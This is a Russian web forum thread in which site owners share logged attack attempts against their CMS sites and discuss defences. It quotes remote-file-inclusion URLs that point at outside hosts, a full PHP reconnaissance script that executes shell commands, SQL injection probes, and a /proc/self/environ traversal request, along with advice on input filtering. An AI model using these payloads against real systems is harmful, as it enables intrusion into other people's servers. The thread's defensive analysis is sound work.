![]() |
![]() |
ВходЗдравствуйте, Гость ( Вход | Регистрация )
|
![]() ![]() |
![]() |
![]() ![]()
Сообщение
#1
|
|
Приблуда ![]() Группа: Пользователи Сообщений: 29 Регистрация: 25.10.2007 Пользователь №: 1,325 Спасибо сказали: 0 Вставить ник ![]() |
СегоднЯ обнаружил 10 писем в почтовом Ящике с сообщением о безопасности.
ЦИТАТА Безопасность Запрещенное действие: URL in GET - path = http://test.bigshop.cz/uploaded/injek.txt?? IP Адрес: 209.151.70.1 Пользователь: Guest Ссылка: //?path=http://test.bigshop.cz/uploaded/injek.txt?? Браузер: libwww-perl/5.833 Дата размещения: 03.02.2010 - 08:45:5 Просмотрев что находитьсЯ по этому адресу увидел код, кто разбираетсЯ, что с помощью этого кода хотели сделать! Кстати показал другу этот адресок, когда он его открыл, у него нод32 сработал и показал ![]() , мой же NOD32 с сегодняшними обновлениЯми не реагирует. Вот код длЯ разбора полётов. Отписываем что с помощью него можно и что хотели сделать? КОД <?php
//eten Response $pwd1 = @getcwd(); $un = @php_uname(); $os = @PHP_OS; $id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();} $sof1 = @getenv("SERVER_SOFTWARE"); $php1 = @phpversion(); $name1 = $_SERVER['SERVER_NAME']; $ip1 = @gethostbyname($SERVER_ADDR); $free1= @diskfreespace($pwd1); $all1= disk_total_space($pwd1); $used = ConvertBytes($all1-$free1); $free = ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;} $all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;} if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";} if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";} echo "eten".$sf."<br>"; echo "uname -a: $un<br>"; echo "os: $os<br>"; echo "id: $id1<br>"; echo "pwd: $pwd1<br>"; echo "php: $php1<br>"; echo "software: $sof1<br>"; echo "srvip: $ip1<br>"; echo "srvname: $name1<br>"; echo "free: $free<br>"; echo "used: $used<br>"; echo "total: $all $perm<br>"; function ConvertBytes($number) { $len = strlen($number); if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); } return sprintf("%0.2f Gb", $number/1024/1024/1024); } function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } else { $res = "NULL"; } } return $res; } exit; ?> |
|
|
![]()
Сообщение
#2
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 765 Регистрация: 10.6.2008 Из: Оренбург Пользователь №: 4,176 Спасибо сказали: 211 Вставить ник ![]() |
Успокойся, ничего страшного. Просто пытались выяснить сведения о твоей системе.
Но конечно на основе этих данных можно планировать дальнейшую атаку на твой сервер. Тоесть например исполнение команды id в ОС типа linux даст вот такой вывод: uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) в том случае если вебсервер (apache например) у тебя запущен от имена root а это уже серьезный прокол в защите системы Сообщение отредактировал vitalik1972: Feb 4 2010, 11:11 |
|
|
![]()
Сообщение
#3
|
|
Приблуда ![]() Группа: Пользователи Сообщений: 29 Регистрация: 25.10.2007 Пользователь №: 1,325 Спасибо сказали: 0 Вставить ник ![]() |
Спасиб за ответ! Думаю что у хостера смышлённые казачки работают, и не будут запускать вебсервер от имени root.
|
|
|
![]()
Сообщение
#4
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 252 Регистрация: 23.1.2009 Из: Россия Пользователь №: 7,096 Спасибо сказали: 7 Вставить ник ![]() |
СегоднЯ обнаружил 10 писем в почтовом Ящике с сообщением о безопасности. Просмотрев что находитьсЯ по этому адресу увидел код, кто разбираетсЯ, что с помощью этого кода хотели сделать! Кстати показал другу этот адресок, когда он его открыл, у него нод32 сработал и показал ![]() , мой же NOD32 с сегодняшними обновлениЯми не реагирует. Вот код длЯ разбора полётов. Отписываем что с помощью него можно и что хотели сделать? Млин, очередной раз повторяю, не храните пароли в файловых менеджерах !!! Раз код туда попал - значит трояном увели пароль. Храните его в голове !!! Трояны постоянно совершенствуются. |
|
|
![]()
Сообщение
#5
|
|
Приблуда ![]() Группа: Пользователи Сообщений: 29 Регистрация: 25.10.2007 Пользователь №: 1,325 Спасибо сказали: 0 Вставить ник ![]() |
Все пароли храню и так в голове, из файловых менеджеров сразу удаляю. Сам код на мой хост не попал, он запускался со стороннего сайта, адрес указан в отчётном письме о безопастности. Последнее времЯ чуть ли не каждый день мне приходЯт сообщениЯ о безопастности. Напиример сегоднЯ тоже пришло, по ходу обращались с другова сайта, код немного другой, но действиЯ те же. Поэтому как только приходит сообщение о безопастности, зразу баню по IP.
ЦИТАТА Безопасность
Запрещенное действие: URL in GET - rootdir = http://scan.ucoz.net/id1.txt? IP Адрес: 121.88.4.141 Пользователь: Guest Ссылка: /index.php//surveys/classes/core/language.php?rootdir=http://scan.ucoz.net/id1.txt? Браузер: Mozilla/5.0 Дата размещения: 08.02.2010 - 23:27:54 |
|
|
![]()
Сообщение
#6
|
|
прорвемся... ![]() Группа: [..AS..] Сообщений: 2,388 Регистрация: 6.9.2008 Из: Latvia Riga-Vangaži Пользователь №: 5,367 Спасибо сказали: 457 Вставить ник ![]() |
дык привыкай не тебе одному разную хрень пытаются всадить мне тоже уже ни раз пытались вот хотя бы это:
/nav.php?go=http://www.gzzsyy.com.cn/brd/id1.txt?? = zfxid.txt <?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?> вот закинь подчеркнутое в гугл там ответов валом будет. |
|
|
![]()
Сообщение
#7
|
|
Приблуда ![]() Группа: Пользователи Сообщений: 29 Регистрация: 25.10.2007 Пользователь №: 1,325 Спасибо сказали: 0 Вставить ник ![]() |
и такое почти каждый день приходит. Надеюсь это не повредит сайту?
|
|
|
![]()
Сообщение
#8
|
|
прорвемся... ![]() Группа: [..AS..] Сообщений: 2,388 Регистрация: 6.9.2008 Из: Latvia Riga-Vangaži Пользователь №: 5,367 Спасибо сказали: 457 Вставить ник ![]() |
ЦИТАТА(xpx @ Сегодня, 04:10 ) и такое почти каждый день приходит. Надеюсь это не повредит сайту? если всадят SQL инекцию, то конечно повредит |
|
|
![]()
Сообщение
#9
|
|
Приблуда ![]() Группа: Пользователи Сообщений: 29 Регистрация: 25.10.2007 Пользователь №: 1,325 Спасибо сказали: 0 Вставить ник ![]() |
Это возможно? Вообще как делают SQL инекцию? Много слышал об этом но не знаю как это делаетсЯ и соответственно не знаю как от этого защищаться?
|
|
|
![]()
Сообщение
#10
|
|
прорвемся... ![]() Группа: [..AS..] Сообщений: 2,388 Регистрация: 6.9.2008 Из: Latvia Riga-Vangaži Пользователь №: 5,367 Спасибо сказали: 457 Вставить ник ![]() |
такую дрянь в первые встечаю, в гугле толкового ответа не нашел, кто зае, что это за дерьмо?-
Попытка взлома: XSS in GET - cat = 44 and 1=0 Union Select 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E69 IP Адрес: 78.84.241.85 Пользователь: Guest Ссылка: /index.php?name=news&cat=44 and 1=0 Union Select 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 ,0x787878756E696F6E787878 , 0x787878756E696F6E787878-- Браузер: unknown Дата размещения: 27.03.2010 - 13:49:03 |
|
|
![]()
Сообщение
#11
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 765 Регистрация: 10.6.2008 Из: Оренбург Пользователь №: 4,176 Спасибо сказали: 211 Вставить ник ![]() |
переполнение буфера GET пытались сделать. ас его нормально воспринимает.
|
vitalik1972, Вас 1 раз(а) поблагодарили за это сообщение: DjSalamander | |
|
|
![]()
Сообщение
#12
|
|
Приблуда ![]() Группа: Пользователи Сообщений: 11 Регистрация: 3.4.2009 Пользователь №: 7,941 Спасибо сказали: 5 Вставить ник ![]() |
Это возможно? Вообще как делают SQL инекцию? Много слышал об этом но не знаю как это делаетсЯ и соответственно не знаю как от этого защищаться? Через передачу в качестве параметра SQL-запроса или скрипта. Защититься на самом деле несложно: нужно проверять передаваемые данные. Бороться с одинарными и двойными кавычками, ограничивать длину передаваемых параметров, блокировать запросы со словами script, UNION и т.д. Если передаваться в качестве параметра должно число, то intval() тебе в помощь, если текст, то text_filter(). Эти функции серьезно портят жизнь любителям инъекций.. |
darkflasher, Вас 1 раз(а) поблагодарили за это сообщение: DjSalamander | |
|
|
![]()
Сообщение
#13
|
|
прорвемся... ![]() Группа: [..AS..] Сообщений: 2,388 Регистрация: 6.9.2008 Из: Latvia Riga-Vangaži Пользователь №: 5,367 Спасибо сказали: 457 Вставить ник ![]() |
ЦИТАТА(darkflasher @ Сегодня, 11:52 ) Если передаваться в качестве параметра должно число, то intval() тебе в помощь, если текст, то text_filter(). Эти функции серьезно портят жизнь любителям инъекций.. нисочти за назойливость, но тут много новичков, так что изложи поподробней, а то не поймут что и кудавсавлять надо (IMG:http://antislaed.net/style_emoticons/default/smile.gif) |
|
|
![]()
Сообщение
#14
|
|
Приблуда ![]() Группа: Пользователи Сообщений: 11 Регистрация: 3.4.2009 Пользователь №: 7,941 Спасибо сказали: 5 Вставить ник ![]() |
нисочти за назойливость, но тут много новичков, так что изложи поподробней, а то не поймут что и кудавсавлять надо (IMG:http://antislaed.net/style_emoticons/default/smile.gif) Например, есть у нас модуль test, который должен принять два параметра, первый - num (число), второй - txt (текст), которые в этом модуле обрабатываются Итак, ссылка, которая наверняка заинтересует взломщика, примерно выглядит так: http://your_site.ru/index.php?name=test&am...10&txt=sort Объясняю смысл ссылки: передать сайту в модуль test два параметра методом GET: num=10 и txt="sort" Будь я на месте взломщика, я бы вместо sort написал плохие вещи и посмотрел, как сайт такое примет))) Поэтому перед тем, как использовать эти параметры, обезопасим себя: КОД if (!defined("MODULE_FILE")) {
Header("Location: ../../index.php"); //стандартно.. нет модуля - на главную.. exit; } function view() { global $db, $prefix, $conf; $num= intval($_GET['num']); //приводим num к числовому формату, вдруг вместо числа пытаются передать текст $txt= text_filter($_GET['txt']); //проверяем текст встроенной функцией AS, которая борется с кавычками, срезает теги и фильтрует слова (их указываем в конфигурации сайта) $txt=substr($txt,0,25); // допустим мы знаем, что параметр txt по идее не должен превышать 25 символов в длину, режем все лишнее - если в параметре передается скрипт, то он останется без концовки, что его сразу обезвредит if ((!$num) || (!$txt)) { Header("Location: /index.php"); //что-то нечисто, выкидываем пользователя на главную.. } else { $result = $db->sql_query("SELECT fulltxt_blablabla FROM ".$prefix."_blablabla WHERE id_blablabla = '$num' AND txt_blablabla LIKE '%$txt%'"); if ($db->sql_numrows($result) == 1) { //перестраховываемся, проверяем, действительно ли выборка успешна, возможно злоумышленник прощупывает базу в надежде найти лазейку list($fulltxt_blablabla) = $db->sql_fetchrow($result); head(); open(); echo $fulltxt_blablabla; //вроде все в порядке, выводим.. close(); foot(); } else { Header("Location: /index.php"); //что-то нечисто, выкидываем пользователя на главную.. } } } switch($op) { default: view(); break; } |
darkflasher, Вас 1 раз(а) поблагодарили за это сообщение: DjSalamander | |
|
|
![]()
Сообщение
#15
|
|
прорвемся... ![]() Группа: [..AS..] Сообщений: 2,388 Регистрация: 6.9.2008 Из: Latvia Riga-Vangaži Пользователь №: 5,367 Спасибо сказали: 457 Вставить ник ![]() |
млин, как меня такая дрянь достала это пипец, и ето 3я часть того что этот мудила там ковырял
КОД Попытка взлома: Hack in GET - id = 1430\'`([{^~ IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'`([{^~ Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:40 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'`([{^~ Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:40 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430\' aND \'8\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:43 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:43 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430\' aND \'8\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:43 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:43 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430\' aND \'8\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:46 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:46 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430\' aND \'8\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:46 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430' aND '8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:46 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430/**/aND/**/8=8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:47 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:47 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430/**/aND/**/8=3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:48 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430/**/aND/**/8=3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:48 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430\'/**/aND/**/\'8\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:48 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:48 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430\'/**/aND/**/\'8\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:49 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430'/**/aND/**/'8'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:49 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430%\' aND \'8%\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:49 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:49 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430%\' aND \'8%\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:50 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:50 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430%\' aND \'8\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:51 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:51 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430%\' aND \'8%\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:52 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%' aND '8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:52 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430%\'/**/aND/**/\'8\'=\'8 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:52 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8'='8 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:52 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430%\'/**/aND/**/\'8%\'=\'3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:53 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430%'/**/aND/**/'8%'='3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:53 --- Попытка взлома: madcat.lv -be one of us... - Безопасность Попытка взлома: Hack in GET - id = 1430/**/XoR/**/8=3 IP Адрес: 123.11.65.137 Пользователь: Guest Ссылка: /index.php?name=news&op=printe&id=1430/**/XoR/**/8=3 Браузер: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Дата размещения: 17.06.2010 - 09:26:58 Кстатье, а как это гамно из файла security.php вычистить, а то уже 150kb набралось? |
|
|
![]()
Сообщение
#16
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 221 Регистрация: 1.11.2008 Пользователь №: 6,111 Спасибо сказали: 35 Вставить ник ![]() |
ЦИТАТА(DjSalamander @ Вчера, 21:48 ) Кстатье, а как это гамно из файла security.php вычистить, а то уже 150kb набралось? Вот нифигасе, а почему у тебя права-то на запись стоят для всяких говнокидателей? Не удивлюсь, если у тебя ещё Register globals включено, это тогда вообще круто (можно посмотреть это в админке, в блоке Системная информация). |
|
|
![]()
Сообщение
#17
|
|
прорвемся... ![]() Группа: [..AS..] Сообщений: 2,388 Регистрация: 6.9.2008 Из: Latvia Riga-Vangaži Пользователь №: 5,367 Спасибо сказали: 457 Вставить ник ![]() |
ЦИТАТА(Mylenovez @ Сегодня, 02:12 ) Register globals включено нет, и никогда небыл включен ЦИТАТА(Mylenovez @ Сегодня, 02:12 ) а почему у тебя права-то на запись стоят тфу неправильно написал, это я в заблуждения ввел, сорри, из файла logs/security/hacks.txt |
|
|
![]()
Сообщение
#18
|
|
Живу на АС ![]() Группа: Пользователи Сообщений: 752 Регистрация: 11.12.2007 Из: Москва а так по всюду гы Пользователь №: 1,591 Спасибо сказали: 154 Вставить ник ![]() |
DjSalamander
те пытались проверить базу на доступность взлома |
|
|
![]()
Сообщение
#19
|
|
Продвинутый юзверь ![]() Группа: Пользователи Сообщений: 99 Регистрация: 30.1.2008 Из: Пермь Пользователь №: 2,154 Спасибо сказали: 26 Вставить ник ![]() |
движок рулит - За все время использования ни одного взлома. птьфу птьфу птьфу (IMG:http://antislaed.net/style_emoticons/default/biggrin.gif) (IMG:http://antislaed.net/style_emoticons/default/biggrin.gif) (IMG:http://antislaed.net/style_emoticons/default/biggrin.gif) (IMG:http://antislaed.net/style_emoticons/default/biggrin.gif) (IMG:http://antislaed.net/style_emoticons/default/biggrin.gif)
|
|
|
![]()
Сообщение
#20
|
|
прорвемся... ![]() Группа: [..AS..] Сообщений: 2,388 Регистрация: 6.9.2008 Из: Latvia Riga-Vangaži Пользователь №: 5,367 Спасибо сказали: 457 Вставить ник ![]() |
ЦИТАТА(Immeasurability @ Сегодня, 09:58 ) те пытались проверить базу на доступность взлома это ясно, уже задрали ковырятса, почти каждый день такая хрень в основном от сюда лезут- IP Адрес: 221.144.12.141 Пользователь: Guest Ссылка: /index.php?name=search&word=lejupl///*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ Браузер: libwww-perl/5.79 Дата размещения: 18.06.2010 - 09:53:19 задлбало это уже по самое немогу |
|
|
